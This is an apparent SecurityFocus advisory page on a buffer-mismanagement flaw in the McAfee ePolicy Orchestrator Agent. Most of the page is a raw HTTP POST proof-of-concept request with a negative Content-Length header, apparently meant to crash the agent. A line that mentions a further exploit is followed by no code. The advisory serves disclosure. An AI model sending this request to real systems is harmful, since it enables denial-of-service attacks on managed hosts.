McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability

The following proof-of-concept has been supplied:

POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive

The following exploit has been provided by Shashank Pandey:


 

Privacy Statement
Copyright 2010, SecurityFocus